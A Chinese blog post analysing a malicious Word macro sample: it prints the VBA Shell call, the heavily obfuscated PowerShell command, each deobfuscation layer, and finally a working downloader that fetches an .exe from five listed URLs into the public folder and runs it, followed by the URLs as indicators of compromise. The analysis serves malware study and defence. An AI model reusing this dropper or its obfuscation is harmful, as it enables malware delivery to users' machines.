记一次Powershell反混淆 (1)

样本地址:
https://www.virustotal.com/#/file/6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1cb0e0/detection

样本为一个Word文件,嵌入Macros,寻找命令执行点比较简单, 稍微跟了一下直接定位到

Sub SssbuNrRrEn(UJXYrqZETb As String)
On Error Resume Next
MfiCpKuAf = RfiiUVAYh - kDjdViQqEL / (6835936 + zKwnqPGLEi - 6704003 + IpdbUjtvvCVI)
zEjLuEwUi = iXmhfkRVQGVwV - AoVXSoin / (7268093 + vRAhOCQHGpnB - 1804077 + ZlPnAjBKFiZ)
Shell UJXYrqZETb, 0
CqNniwttB = DPYGvFXuwi - IKEJaznChl / (2341580 + IMMCUXrtI - 1601950 + WVqhEidP)
HADtjJdIw = qTkrzQuj - DXHoNAC / (6577259 + jSiYDVFRESftq - 2966087 + mRoXiXZmUbasz)
End Sub

明显可以看到UJXYrqZETb比较关键,len(UJXYrqZETb) = 3263,不能直接通过Debug - Add watch获取, 可以将UJXYrqZETb写入文件从而获取完整的UJXYrqZETb值。

Sub SssbuNrRrEn(UJXYrqZETb As String)
On Error Resume Next
MfiCpKuAf = RfiiUVAYh - kDjdViQqEL / (6835936 + zKwnqPGLEi - 6704003 + IpdbUjtvvCVI)
zEjLuEwUi = iXmhfkRVQGVwV - AoVXSoin / (7268093 + vRAhOCQHGpnB - 1804077 + ZlPnAjBKFiZ)

Set objFSO=CreateObject("Scripting.FileSystemObject")

outFile="c:\windows\temp\output.txt"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write "test string" 
objFile.Close

' Shell UJXYrqZETb, 0
CqNniwttB = DPYGvFXuwi - IKEJaznChl / (2341580 + IMMCUXrtI - 1601950 + WVqhEidP)
HADtjJdIw = qTkrzQuj - DXHoNAC / (6577259 + jSiYDVFRESftq - 2966087 + mRoXiXZmUbasz)
End Sub

查看output.txt 获取cmd命令

cmd     hhwjquui   qwgeui   qwgeiqweqwe iqw  ohd   ioqwhd   ioqwhido  &       %C^om^S^p^Ec%          /V         /c           set %VBiwAbXNZVRf%=p^o^w^er&&set %WVXlCPwVdc%=^sh^ell&&!%VBiwAbXNZVRf%!!%WVXlCPwVdc%! " & ( $VErBOSePReFErenCe.TOSTrIng()[1,3]+'X'-joIn'')( ((' '+'.( ([stRIN'+'g]j'+'3xVeRBoSepreFerence)[1,3]+cv5Xcv5-Joincv5cv5) ( ('+'cv'+'5.((gET-vcv5+cv5aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS'+'0PS0P) ( (S'+'0P((iMP4YoiMP+iMPnsi'+'MP+iMP'+'aiMP+iMPdasd = &(Y4EnY4Ecv5+cv5+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PPcv5+cv5S0'+'P+S0PcY4Ei'+'MP+iMP+Y4EtYiMP+iMP4Ei'+'MP+iMPS0P+S0P) random;4YoiMP+cv'+'5+cv5iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+'+'iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'cv5+cv5MP SysiMP+'+'i'+'MPtemiMP+iMP.Net.iMP'+'+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+cv5+cv5'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomi'+'M'+'P+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'cv5+cv5+iMPS0P+S0Phttp:iMP+iMP/iMP+cv5+cv5iMP/iMP+cv5+cv5iMPdiMP+iMPuicv5+cv5M'+'P+iMPlcv5+cv5faciMP'+'+iMPolltiMP+iMPdaiMP+iMP.iMP+iMP'+'ciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPati'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.com/cv5+cv5DiMP+iMPIjVX4UiM'+'P+iMP/?http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMPcv5+cv5Split(i'+'MP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP i'+'MP+iMP= 4Yicv5+cv5MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc cv5+cv5+ iMcv5+cv5P+iMPY4iMP+iMPEicv5+cv5MP+iMPjPIY4E +iMP+iMS0P+S0PP 4Y'+'oN'+'iMPcv5+cv5+iMPSiMP+iMPB i'+'MP+iMP+ (Y4E.ecv5+cv5iMP+iMPxY4E+Y4EeYiMP+iMcv5+cv5P4E)iM'+'P+iMP;iMPcv5+cv5+iMcv5+cv5PfiMP'+'+iMPoreaiMP+iMPciMPcv5+cv5+iMPhiMP'+'cv5+cv5+iMP(4Y'+'oaiS0P+S0PMP+iMPsfc iniMP'+'+iMP 4YoADiMP+'+'iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU'+'.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLcv5+cv5dlicv5+cv5MS0P+S0PP+iMPS0P+cv5+cv5'+'S0PeiMP+i'+'MPWiMP+iMP2K('+'4Ycv5+cv5iMP+iMPoiMP+iM'+'PasfciMP+iMP.W'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+'+'iMPEiMP+iMS0P+S0PPcv5+cv5+Y4EiMP+iMPe-IiMc'+'v5+cv5P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]'+'52+[Char]69),[CS0Pcv5+cv5'+'+S0P'+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace  i'+'MPjPIiMP,[Char]92  -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]111),[Char]3S0P+S0P6-cREPLACe(['+'C'+'har]118'+'+[Char]7'+'6+[ChS0P+'+'S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQs'+'hElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71'+'+[ChAR]65),S0P6wnS'+'0P).rePLaCE'+'(S0PIdQS0P,[sTriNG][cv5+cv5ChAR]36).recv5+cv5PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )cv5'+').rep'+'lAcE(([Char]83+[Char]48+['+'Ch'+'ar]80),[stRiNG][Char]39).replAcE(cv56wncv5,cv5X2'+'zcv5)) ') -CRePLace  'cv5',[cHAR]39 -ReplACE ([cHAR]88+[cHAR]50+[cHAR]122),[cHAR]124  -CRePLace 'j3x',[cHAR]36) )

然后像洋葱一样一层一层剥开你的心:

ieX( ((' '+'.( ([stRIN'+'g]j'+'3xVeRBoSepreFerence)[1,3]+cv5Xcv5-Joincv5cv5) ( ('+'cv'+'5.((gET-vcv5+cv5aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS'+'0PS0P) ( (S'+'0P((iMP4YoiMP+iMPnsi'+'MP+iMP'+'aiMP+iMPdasd = &(Y4EnY4Ecv5+cv5+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PPcv5+cv5S0'+'P+S0PcY4Ei'+'MP+iMP+Y4EtYiMP+iMP4Ei'+'MP+iMPS0P+S0P) random;4YoiMP+cv'+'5+cv5iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+'+'iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'cv5+cv5MP SysiMP+'+'i'+'MPtemiMP+iMP.Net.iMP'+'+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+cv5+cv5'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomi'+'M'+'P+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'cv5+cv5+iMPS0P+S0Phttp:iMP+iMP/iMP+cv5+cv5iMP/iMP+cv5+cv5iMPdiMP+iMPuicv5+cv5M'+'P+iMPlcv5+cv5faciMP'+'+iMPolltiMP+iMPdaiMP+iMP.iMP+iMP'+'ciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPati'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.com/cv5+cv5DiMP+iMPIjVX4UiM'+'P+iMP/?http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMPcv5+cv5Split(i'+'MP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP i'+'MP+iMP= 4Yicv5+cv5MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc cv5+cv5+ iMcv5+cv5P+iMPY4iMP+iMPEicv5+cv5MP+iMPjPIY4E +iMP+iMS0P+S0PP 4Y'+'oN'+'iMPcv5+cv5+iMPSiMP+iMPB i'+'MP+iMP+ (Y4E.ecv5+cv5iMP+iMPxY4E+Y4EeYiMP+iMcv5+cv5P4E)iM'+'P+iMP;iMPcv5+cv5+iMcv5+cv5PfiMP'+'+iMPoreaiMP+iMPciMPcv5+cv5+iMPhiMP'+'cv5+cv5+iMP(4Y'+'oaiS0P+S0PMP+iMPsfc iniMP'+'+iMP 4YoADiMP+'+'iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU'+'.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLcv5+cv5dlicv5+cv5MS0P+S0PP+iMPS0P+cv5+cv5'+'S0PeiMP+i'+'MPWiMP+iMP2K('+'4Ycv5+cv5iMP+iMPoiMP+iM'+'PasfciMP+iMP.W'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+'+'iMPEiMP+iMS0P+S0PPcv5+cv5+Y4EiMP+iMPe-IiMc'+'v5+cv5P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]'+'52+[Char]69),[CS0Pcv5+cv5'+'+S0P'+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace  i'+'MPjPIiMP,[Char]92  -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]111),[Char]3S0P+S0P6-cREPLACe(['+'C'+'har]118'+'+[Char]7'+'6+[ChS0P+'+'S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQs'+'hElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71'+'+[ChAR]65),S0P6wnS'+'0P).rePLaCE'+'(S0PIdQS0P,[sTriNG][cv5+cv5ChAR]36).recv5+cv5PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )cv5'+').rep'+'lAcE(([Char]83+[Char]48+['+'Ch'+'ar]80),[stRiNG][Char]39).replAcE(cv56wncv5,cv5X2'+'zcv5)) ') -CRePLace  'cv5',[cHAR]39 -ReplACE ([cHAR]88+[cHAR]50+[cHAR]122),[cHAR]124  -CRePLace 'j3x',[cHAR]36) )
ieX(  .( ([stRINg]$VeRBoSepreFerence)[1,3]+'X'-Join'') ( ('.((gET-v'+'aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS0PS0P) ( (S0P((
iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E'+'+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PP'+'S0P+S0PcY4EiMP+iMP+Y4EtYiMP+
iMP4EiMP+iMPS0P+S0P) random;4YoiMP+'+'iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMP
oS0P+S0PbjectYiMP+iMP4E)iMP+i'+'MP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiM'+'P+iMP =iMP+iMP 4i
MP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)iMP+iS0P+S0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP
+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFWS0P+S
0P/?iS0P+S0PMP'+'+iMPS0P+S0Phttp:iMP+iMP/iMP+'+'iMP/iMP+'+'iMPdiMP+iMPui'+'MP+iMPl'+'faciMP+iMPolltiMP+iMPdaiMP+iMP.iMP
+iMPciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S0PMP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMPS0P+S0P.au/S0P+S0PkiMP+i
'+'MPRiMP+iMPBGS7S0P+S0'+'P/?iMP+iMS0P+S0PPhttiMP+iMPps://www.blueyachtchiM'+'P+iMParte'+'r.com/'+'DiMP+iMPIjVX4UiMP+iM
P/?http://reiMP+iMPviewzaap.aiMP+'+'iMPzurewS0P+S'+'0PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMP'+'Split(iMP+iM
PY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP iMP+iMP= 4Yi'+'MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc '+'+ iM'+'P+i
MPY4iMP+iMPEi'+'MP+iMPjPIY4E +iMP+iMS0P+S0PP 4YoNiMP'+'+iMPSiMP+iMPB iMP+iMP+ (Y4E.e'+'iMP+iMPxY4E+Y4EeYiMP+iM'+'P4E)iM
P+iMP;iMP'+'+iM'+'PfiMP+iMPoreaiMP+iMPciMP'+'+iMPhiMP'+'+iMP(4YoaiS0P+S0PMP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiM
P+iMPryiMP+iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvL'+'dli'+'MS0P+S0PP+iMPS0P+'+'S0PeiMP+iMPWiMP+iMP2K(4Y'+'iMP+iM
PoiMP+iMPasfciMP+iMP.W2iMP+iMPKiS0P+S0PMP+iMPTiMS0P+S0PP+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+i
MPIn'+'voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+iMPEiMP+iMS0P+S0PP'+'+Y4EiMP+iMPe-IiM'+'P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4
YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]52+[Char]69),[CS0P'+'+S0Phar]39 -cRS0P+S0'+'PEPLACei
MPW2KiMP,[Char]34 -rEpLace  iMPjPIiMP,[Char]92  -c'+'REPLACe([Char]52+[C'+'har]89+[Char]111),[Char]3S0P+S0P6-cREPLACe([
Char]118+[Char]76+[ChS0P+S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118
+[ChAR]71+[ChAR]65),S0P6wnS0P).rePLaCE(S0PIdQS0P,[sTriNG]['+'ChAR]36).re'+'PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )').replAc
E(([Char]83+[Char]48+[Char]80),[stRiNG][Char]39).replAcE('6wn','|'))  )


ieX(  .ieX ( ('.((gET-v'+'aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS0PS0P) ( (S0P((iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E'+'+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PP'+'S0P+S0PcY4EiMP+iMP+Y4EtYiMP+iMP4EiMP+iMPS0P+S0P) random;4YoiMP+'+'iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'MP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiM'+'P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)iMP+iS0P+S0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'+iMPS0P+S0Phttp:iMP+iMP/iMP+'+'iMP/iMP+'+'iMPdiMP+iMPui'+'MP+iMPl'+'faciMP+iMPolltiMP+iMPdaiMP+iMP.iMP+iMPciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S0PMP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMPS0P+S0P.au/S0P+S0PkiMP+i'+'MPRiMP+iMPBGS7S0P+S0'+'P/?iMP+iMS0P+S0PPhttiMP+iMPps://www.blueyachtchiM'+'P+iMParte'+'r.com/'+'DiMP+iMPIjVX4UiMP+iMP/?http://reiMP+iMPviewzaap.aiMP+'+'iMPzurewS0P+S'+'0PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMP'+'Split(iMP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP iMP+iMP= 4Yi'+'MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc '+'+ iM'+'P+iMPY4iMP+iMPEi'+'MP+iMPjPIY4E +iMP+iMS0P+S0PP 4YoNiMP'+'+iMPSiMP+iMPB iMP+iMP+ (Y4E.e'+'iMP+iMPxY4E+Y4EeYiMP+iM'+'P4E)iMP+iMP;iMP'+'+iM'+'PfiMP+iMPoreaiMP+iMPciMP'+'+iMPhiMP'+'+iMP(4YoaiS0P+S0PMP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvL'+'dli'+'MS0P+S0PP+iMPS0P+'+'S0PeiMP+iMPWiMP+iMP2K(4Y'+'iMP+iMPoiMP+iMPasfciMP+iMP.W2iMP+iMPKiS0P+S0PMP+iMPTiMS0P+S0PP+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+iMPIn'+'voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+iMPEiMP+iMS0P+S0PP'+'+Y4EiMP+iMPe-IiM'+'P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]52+[Char]69),[CS0P'+'+S0Phar]39 -cRS0P+S0'+'PEPLACeiMPW2KiMP,[Char]34 -rEpLace  iMPjPIiMP,[Char]92  -c'+'REPLACe([Char]52+[C'+'har]89+[Char]111),[Char]3S0P+S0P6-cREPLACe([Char]118+[Char]76+[ChS0P+S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71+[ChAR]65),S0P6wnS0P).rePLaCE(S0PIdQS0P,[sTriNG]['+'ChAR]36).re'+'PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )').replAcE(([Char]83+[Char]48+[Char]80),[stRiNG][Char]39).replAcE('6wn','|'))  )

ieX(  .ieX .((gET-vaRIAbLE '*MDr*').NamE[3,11,2]-joiN'') ( ('((iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E+Y4EeY4E+Y4Ew-oiMP+iM
PbjeiMP+iM'+'P'+'cY4EiMP+iMP+Y4EtYiMP+iMP4EiMP+iMP'+') random;4YoiMP+iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iM
P+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMPo'+'bjectYiMP+iMP4E)iMP+iMP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMP
SBiMP+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.n'+'extiMP+iMP(10000, 2iMP+iMP82133)iMP+i'+'MP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX
 = i'+'MP+iMPY4EiMP+iM'+'P iMP+iMPhtiMP+iMPtp:/iMP+iM'+'P/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFW'+'/?i'
+'MP+iMP'+'http:iMP+iMP/iMP+iMP/iMP+iMPdiMP+iMPuiMP+iMPlfaciMP+iMPolltiMP+iMPdaiMP+iMP.iMP+iMPciMP+iMPom/rLiMP+iMP7zkpa
/iMP+i'+'MP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMP'+'.au/'+'kiMP+iMPRiMP+iMPBGS7'+'/?iMP+iM'+'PhttiMP+iMPps
://www.blueyachtchiMP+iMParter.com/DiMP+iMPIjVX4UiMP+iMP/?http://reiMP+iMPviewzaap.aiMP+iMPzurew'+'iMP+iMPebsitesiMP+iM
P.net/oMgoZ/Y4iMP+iMPE.iMP+iMPSplit(iMP+iMPY4E?Y4E);4YiMP+iMPoSDC'+'iMP+iMP iMP+iMP= 4YiMP+iMPoi'+'MP+iMPeniMP'+'+iMPv:
publiiMP+iMPc + iMP+iMPY4iMP+iMPEiMP+iMPjPIY4E +iMP+iM'+'P 4YoNiMP+iMPSiMP+iMPB iMP+iMP+ (Y4E.eiMP+iMPxY4E+Y4EeYiMP+iMP
4E)iMP+iMP;iMP+iMPfiMP+iMPoreaiMP+iMPciMP+iMPhiMP+iMP(4Yoai'+'MP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiMP+iMPryiMP+
iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLdliM'+'P+iMP'+'eiMP+iMPWiMP+iMP2K(4YiMP+iMPoiMP+iMPasfciMP+iMP.W2iMP+iMPK
i'+'MP+iMPTiM'+'P+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+iMPInvoiMP+iMPY4'+'EiMP+iMP+Y4EkY4iMP+iM
PEiMP+iM'+'P+Y4EiMP+iMPe-IiMP+iMPteiMP+'+'iMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89
+[Char]52+[Char]69),[C'+'har]39 -cR'+'EPLACeiMPW2KiMP,[Char]34 -rEpLace  iMPjPIiMP,[Char]92  -cREPLACe([Char]52+[Char]8
9+[Char]111),[Char]3'+'6-cREPLACe([Char]118+[Char]76+[Ch'+'ar]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iM'+'PX
iMP)').rePLaCE(([ChAR]118+[ChAR]71+[ChAR]65),'|').rePLaCE('IdQ',[sTriNG][ChAR]36).rePLaCE('iMP',[sTriNG][ChAR]39) ) )
ieX(  .ieX .ieX (('4Yo'+'ns'+'a'+'dasd = &(Y4EnY4E+Y4EeY4E+Y4Ew-o'+'bje'+'cY4E'+'+Y4EtY'+'4E'+') random;4Yo'+'YY'+'U'+' ='+' .(Y4En'+'e
Y4E+'+'Y4EwY4'+'E+Y4E-'+'objectY'+'4E)'+' Sys'+'tem'+'.Net.'+'WebC'+'lient;4YoN'+'SB'+' ='+' 4'+'Yonsada'+'sd.next'+'(1
0000, 2'+'82133)'+';4YoA'+'D'+'C'+'X = '+'Y4E'+' '+'ht'+'tp:/'+'/'+'www.elosduvale.'+'com'+'.b'+'r/OUFW/?'+'http:'+'/'+
'/'+'d'+'u'+'lfac'+'ollt'+'da'+'.'+'c'+'om/rL'+'7zkpa/'+'?http://j'+'ati.'+'c'+'o'+'m'+'.au/k'+'R'+'BGS7/?'+'htt'+'ps:/
/www.blueyachtch'+'arter.com/D'+'IjVX4U'+'/?http://re'+'viewzaap.a'+'zurew'+'ebsites'+'.net/oMgoZ/Y4'+'E.'+'Split('+'Y4
E?Y4E);4Y'+'oSDC'+' '+'= 4Y'+'o'+'en'+'v:publi'+'c + '+'Y4'+'E'+'jPIY4E +'+' 4YoN'+'S'+'B '+'+ (Y4E.e'+'xY4E+Y4EeY'+'4E
)'+';'+'f'+'orea'+'c'+'h'+'(4Yoa'+'sfc in'+' 4YoAD'+'CX'+'){t'+'ry'+'{4YoYYU.W2KDovLdW'+'nlvLd'+'OadFIvLdl'+'e'+'W'+'2K
(4Y'+'o'+'asfc'+'.W2'+'K'+'T'+'oStrvLdivLdNgW2K()'+', 4YoSD'+'C);&'+'(Y4E'+'Invo'+'Y4E'+'+Y4EkY4'+'E'+'+Y4E'+'e-I'+'te'
+'mY'+'4E)(4YoSDC)'+';break;'+'}catch{}}')  -rEpLace ([Char]89+[Char]52+[Char]69),[Char]39 -cREPLACe'W2K',[Char]34 -rEp
Lace  'jPI',[Char]92  -cREPLACe([Char]52+[Char]89+[Char]111),[Char]36-cREPLACe([Char]118+[Char]76+[Char]100),[Char]96)|
& ( $sheLLiD[1]+$shElLiD[13]+'X') )
ieX(  .ieX .ieX ($nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000
, 282133);$ADCX = ' http://www.elosduvale.com.br/OUFW/?http://dulfacolltda.com/rL7zkpa/?http://jati.com.au/kRBGS7/?http
s://www.blueyachtcharter.com/DIjVX4U/?http://reviewzaap.azurewebsites.net/oMgoZ/'.Split('?');$SDC = $env:public + '\' +
 $NSB + ('.ex'+'e');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item
')($SDC);break;}catch{}} |& ( $sheLLiD[1]+$shElLiD[13]+'X') )

Network IoCs:

http://www.elosduvale.com.br/OUFW/
http://dulfacolltda.com/rL7zkpa/
http://jati.com.au/kRBGS7/
https://www.blueyachtcharter.com/DIjVX4U/
http://reviewzaap.azurewebsites.net/oMgoZ/

转载于:https://www.cnblogs.com/xiaoxiaoleo/p/8578567.html

你可能感兴趣的:(记一次Powershell反混淆 (1))